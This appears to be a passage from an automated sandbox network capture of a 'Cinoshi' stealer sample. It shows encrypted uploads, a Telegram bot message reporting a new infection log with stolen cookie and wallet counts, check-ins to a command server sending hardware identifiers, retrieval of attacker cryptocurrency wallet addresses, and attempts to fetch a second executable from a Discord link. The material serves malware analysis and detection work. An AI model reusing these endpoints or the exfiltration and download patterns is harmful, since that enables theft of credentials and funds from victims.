                                                                                    2024-01-04 07:30:07 UTC8192OUTData Raw: b2 3c f9 86 80 38 11 6a 7c 7c d3 c3 31 ff 77 5d b7 c8 32 32 6b 56 2f d4 8e 35 77 da e3 41 c4 ba e0 9b ae 5a 53 bb 69 cf ae b2 a6 46 28 50 33 b5 c2 0d 86 09 2e d8 e0 f9 d6 7d cb 62 cc 52 14 f3 f5 40 6a bc d7 a4 da 38 ca b0 cb 95 f5 7d 37 63 54 ac ce 35 ea 64 74 71 a1 58 75 a9 65 79 4e 2e 4f e9 e9 b4 b8 b9 7a 36 2f ff a2 db ac 5f cc 94 17 93 b6 e5 d7 7a e8 2a 57 98 3e 77 da cf b4 77 3c 55 11 77 53 b3 6a 64 1c 9b 78 86 be db 36 96 b1 0d ec 8a 96 87 47 c7 7c ab a3 7e 30 b7 f3 b0 a0 28 05 6c 7c 1d 64 7c 5e 22 e4 ec f2 c3 aa d3 38 48 cc 21 7c c0 14 9e f4 e8 a5 7e 32 75 fa 27 8f 2c b1 47 6b a3 c6 c1 25 61 da fc 73 54 f6 50 0f 23 08 12 91 3f 5e d5 53 bf 96 2f 66 65 bf 38 f1 6c 83 92 91 de f6 95 60 7c 54 a8 6d f7 4c 3b 64 82 e3 73 e7 bc 8b be cb 6f 9e d5 d9 53 26
                                                                                    Data Ascii: <8j||1w]22kV/5wAZSiF(P3.}bR@j8}7cT5dtqXueyN.Oz6/_z*W>ww<UwSjdx6G|~0(l|d|^"8H!|~2u',Gk%asTP#?^S/fe8l`|TmL;dsoS&
                                                                                    2024-01-04 07:30:07 UTC8192OUTData Raw: 05 5a 76 51 94 d5 b3 90 1a 82 84 f6 70 cb 01 96 e1 5f b8 9e 81 bd f8 5f 76 bc 7c 2c fd ec b7 47 75 90 0f 59 ec af fc f2 75 37 23 32 9d c9 92 f4 f4 2f 71 cd 31 34 30 4e 3c 62 19 b2 8a c1 1a 28 ec a8 d0 5e 9d 17 95 d1 2f e6 da 21 a2 fd 2e 99 e2 ac 45 3f 0a 4b e5 e7 df cb aa 4b 38 03 99 80 53 c9 1b ae 2f 2e 22 30 f6 93 5f f5 87 cc 34 67 1e 87 93 2d 18 8b 53 cd d1 df 68 5d 26 bf 1c 75 19 8e 21 a0 af 73 8e f8 c4 14 33 16 f7 e6 21 c8 9c e3 e2 8d bd cb 25 f9 b7 54 2c 2b a9 29 04 c4 59 17 4e 63 cc 77 28 05 66 2d 25 66 1e bf 33 3f 45 61 8a 77 03 1d 16 31 2f d6 60 70 b2 7c d7 8c fa e8 9d 67 73 ec c7 b2 77 0b f3 8a ad fc da 68 e9 17 a9 5c 85 94 1e 19 d7 7c c5 dd 96 f0 91 77 29 e6 d4 0e 28 5d 84 bb ad 2c 22 84 b2 53 c4 ec b2 b7 39 de b8 67 8d 9a 76 44 b0 eb 8e 12 b0
                                                                                    Data Ascii: ZvQp__v|,GuYu7#2/q140N<b(^/!.E?KK8S/."0_4g-Sh]&u!s3!%T,+)YNcw(f-%f3?Eaw1/`p|gswh\|w)(],"S9gvD
                                                                                    2024-01-04 07:30:07 UTC8192OUTData Raw: ea 13 4a dd ad ce a7 cb b9 bc b6 15 8b 38 05 2a d5 84 cc fb 1b 14 99 49 76 88 de 89 8c 5c 1b a7 52 3a bb c6 bc 83 68 27 ce 61 57 c4 6a 97 93 f5 46 06 a6 26 67 2f 6e b6 1c d9 f9 a8 bb bc fe 7e 6c d7 8d dd 66 2d 02 dc 8b 45 aa 2c 1e 5a 7a 49 d4 ad 42 c4 21 d3 82 85 5f 07 5b d0 bb ac cc e8 8f aa b9 cb 3a 51 82 29 69 21 a4 72 7f ef ff 21 15 6c ac 6b cc 01 6d 7c 97 f7 b4 0c 33 fe a4 9e d6 c8 9c 35 bc 5e ec f7 45 eb a9 4d f1 4f 56 05 13 1a b7 92 79 f3 f3 e3 ec 94 b9 ec e7 22 dc 61 72 1a 93 5f 3f 84 dd 67 7e f4 9e e1 b2 8f 7d 65 93 13 c2 fa d9 4a 1b db b5 da 32 5c ad cf 2c c6 e0 c9 83 ab 6a f5 36 b3 54 79 25 08 d4 ae b0 4f 8b ed 19 48 ba f7 0c 34 75 21 f4 cb 18 02 ff d5 7f fb fc 7b 8f 27 cf 61 f5 90 d7 6e ed da a4 2c 5b 63 89 f1 e3 62 bf 40 86 8b d6 f4 f7 41 97
                                                                                    Data Ascii: J8*Iv\R:h'aWjF&g/n~lf-E,ZzIB!_[:Q)i!r!lkm|35^EMOVy"ar_?g~}eJ2\,j6Ty%OH4u!{'an,[cb@A
                                                                                    2024-01-04 07:30:08 UTC1369INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vd44W%2B%2BrDp3SGgnAf%2Bcib7WmYQFl5YwAkj3gdUy5y1GHFN7cRyJ6ZudNb%2BP2kjFBL7avE%2FnoqoXqBvCxSW6Iy7dhXFRKVAqcwFWPqjBxr02EVJHMCxsejlpdenDG7PfXpwT%2FFL55"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c63aa9b3073b-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    54a
                                                                                    {"ok":true,"result":{"message_id":5,"from":{"id":6823787483,"is_bot":true,"first_name":"attackhelicopter","username":"attackhelicopter_bot"},"chat":{"id":6915840646,"first_name":"Ihsonic","username":"sonic_adm","type":"private"},"date":1704353408,"text":"\ud83d\udd14 Wow, clerleq! Looks like a new log has arrived!\n\nDate of infection: 2024-01-04\nTime of infection: 10:30:07\nIP Address: 102.165.48.52\n\n\ud83d\uddc2 Build Name: am\n\ud83c\udf0f Log Country: US\n\ud83d\udda5 Username: user\n\n\ud83d\udd11 Passwords Count: 0\n\ud83c\udf6a Cookies Count: 2\n\ud83d\udcb8 Wallets Count: 0\n\ud83d\udcb3 Cards Count: 0\n\ud83d\udd0d Domain Detects: 0\n\nCinoshi \u2014 the best project of all free ones that cares about your safety and the protection of


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.649723104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:08 UTC86OUTGET //ferr.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:09 UTC574INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:09 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Crvjaymk8gifM3byfwNpEYPSTwar0wQZWqqIgRwkUbYpKKSyEhosmAdqUI4JpHqBB2H6iJ0lIeINDHjV9soPFRk%2BSPGwghrNqdMOjiAN5nDLNOPyMFRltcviZPuzoS0iOTtqRRY%2B"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6445ae120c9-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:09 UTC41INData Raw: 32 33 0d 0a 57 69 6e 64 6f 77 73 31 31 72 65 71 75 69 72 65 64 7c 57 69 6e 64 6f 77 73 31 31 72 65 71 75 69 72 65 64 0d 0a
                                                                                    Data Ascii: 23Windows11required|Windows11required
                                                                                    2024-01-04 07:30:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.64972615.204.213.54433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:13 UTC69OUTGET /?output=xml HTTP/1.1
                                                                                    Host: ipwho.is
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:13 UTC207INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:13 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Server: ipwhois
                                                                                    Access-Control-Allow-Headers: *
                                                                                    X-Robots-Tag: noindex
                                                                                    2024-01-04 07:30:13 UTC967INData Raw: 33 62 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 31 30 32 2e 31 36 35 2e 34 38 2e 35 32 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 44 69 73
                                                                                    Data Ascii: 3bb<?xml version="1.0" encoding="UTF-8"?><query><ip>102.165.48.52</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><region>Dis


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.649729104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:14 UTC101OUTGET /getwallet.php?id=1081&wallet=btc HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:15 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NKnmbX9Szfm5wCA34C9Q2YjF2oGDJ79%2BoZKZdMlfbuPOLqoHEtZrgBbO8AKslDTT%2FhPqQ2nHulKvw2%2B2fwGanOPPkcgvw5yLTjL8VxqEz1444dq0BCwkETkERXqcGiImPbg7zP26"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c668daa52d1e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:15 UTC48INData Raw: 32 61 0d 0a 62 63 31 71 38 30 38 72 70 74 7a 37 6a 70 72 61 76 79 6b 32 79 36 6b 6a 33 71 79 37 6a 37 75 6d 71 61 37 68 74 79 6a 6b 38 33 0d 0a
                                                                                    Data Ascii: 2abc1q808rptz7jpravyk2y6kj3qy7j7umqa7htyjk83
                                                                                    2024-01-04 07:30:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.649730104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:14 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:15 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=APap13xjVSHxoAS2jW76zukgY1iZtOfHn57vlNJAd8fmwg8sOzrtBTveZWf2oMLN1zxfKhSNOczLbeW7SRof48zncj%2FajH4mN4Pmkk28%2FjMtFSVhmAUSWsCBtg%2BEEpfSoklPfnOi"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c668d8f22087-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:15 UTC12INData Raw: 37 0d 0a 53 55 43 43 45 53 53 0d 0a
                                                                                    Data Ascii: 7SUCCESS
                                                                                    2024-01-04 07:30:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.649734104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:15 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:15 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eexGEtcdKTq%2FbLl7DFpMKQgdle02uleYp2NhOcvV%2Fw8pmjqWu8exBAFY504sZO%2BcvQLpWEBiFrE1kGiRXGFKiuBnDFa7%2FS6OyrqcpNi3suTcCxzNtZKnoeQCrSpnh3fHX7dCIv1j"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c66e6c2705d2-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:15 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.649733104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:15 UTC77OUTGET /getwallet.php?id=1081&wallet=eth HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:15 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DMxVpqdWSduK%2BfQBt2p0RgkurcC6wDPpV4ux03a4UET%2BZAITGT1cQJvk5Zmy6O7vR2kD2ZHpwn8UyJWdJhqYUcuB8cH8YT3EsVoGXkhuogI5iHwR6NXxXC%2FkhNaHkIKR5vYzYPbq"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c66e58e12d1b-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:15 UTC48INData Raw: 32 61 0d 0a 30 78 37 66 32 42 62 46 37 44 32 34 65 66 39 33 30 66 63 33 62 30 45 32 39 43 37 33 35 65 38 65 65 30 33 31 31 46 66 36 46 65 0d 0a
                                                                                    Data Ascii: 2a0x7f2BbF7D24ef930fc3b0E29C735e8ee0311Ff6Fe
                                                                                    2024-01-04 07:30:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.649735104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:15 UTC77OUTGET /getwallet.php?id=1081&wallet=xmr HTTP/1.1
                                                                                    Host: central-cee-doja.ru


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.649736162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:16 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:16 UTC1327INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:16 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6748b090627-IAD
                                                                                    CF-Cache-Status: MISS
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:16 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=2e.ktMAaKcKDZm.a2PBXWzimJNiIknPB1T4Z_Ez1FW4-1704353416-1-Adtb+ZKl6oo8bPKEN1yBM4J0oPvAfpJSD+Eg+vhyYLvX1BDNZeegKuSwdWftfJ8iRCKgHCu4l5LXYf/TQdYXqbE=; path=/; expires=Thu, 04-Jan-24 08:00:16 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ATbz4f6%2FbpTzlMthvQkOtokyZvnoQQ6vl8OoVMWc8N%2FcJpKN1lRVdGqeim4Z8fj2vRSQl4K8b26DsUDt4V8DE8zpLYrhMbKYppc%2B4EleEEaqIya8BnZ2rCvGdjr%2BoG9T0eaXXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=upUeR6ZScmfeeSJ4FSUaSoptDRqYHZ5OBdyUYEWWyC4-1704353416455-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:16 UTC42INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Err
                                                                                    2024-01-04 07:30:16 UTC194INData Raw: 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: or><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.649737104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:16 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:17 UTC586INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eGBHfOXFoC9jl%2Fbq6IsD319nF2bwn%2FTO9HT%2FrIp8QycCWA1D7HLrup%2Bs729QsZtBHdeuZ7jtLdW6wR%2FgIVwnnHX%2FC%2BkkiRNOzcKexJwKRNTGpm7CEzVVWZorbwxsYsL6mxLNCK%2Bv"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c67858ee2028-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:17 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.649738104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:17 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:18 UTC607INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TaQ2OflAS1O%2FO20KpEEem1rqCnY%2BS7FHCZ9m3n5Un4wBWB%2B%2Bd1XxGLnQtX5AFu68wDVqtPpRd7J%2FWBhVbuMZaKiIyXBCtz55sp%2BdModpGanRNIkSTv04jHmt%2BXabMVRo0Zc17lNw"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c67cba91577e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:18 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.649739162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:18 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:18 UTC1334INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:18 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6810c6f2d16-IAD
                                                                                    CF-Cache-Status: MISS
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:18 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=jCjcMB1G.D1FRlZKzEQ7Mjs7Z1291eNfR2zTHNHQU_A-1704353418-1-AZhOPa9whDtLvUjin4OxyMSI9UiDJTH10V2QViQuXqEdzpP2KQ9321OMv3M+okJt8F1oDGnARliKduJQyq7FH/Y=; path=/; expires=Thu, 04-Jan-24 08:00:18 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mMJ1acQu5Rx0%2FK0TycFFQ48PwisjFeu6bvr4CSPgJu%2B5LlKV6mXKhpjwGh5OG6SrR54UKGuyKPRF6ei2Gy%2FqARpV%2BqelTEjEsbBbB2zdNbvVDOTLujQaJhEc8jGe8whKFSU6mA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=9UX0TcAwkNGMPR8vYRT1wgioM3uIOBf90yBKCNUxyuU-1704353418470-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:18 UTC35INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8
                                                                                    2024-01-04 07:30:18 UTC201INData Raw: 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
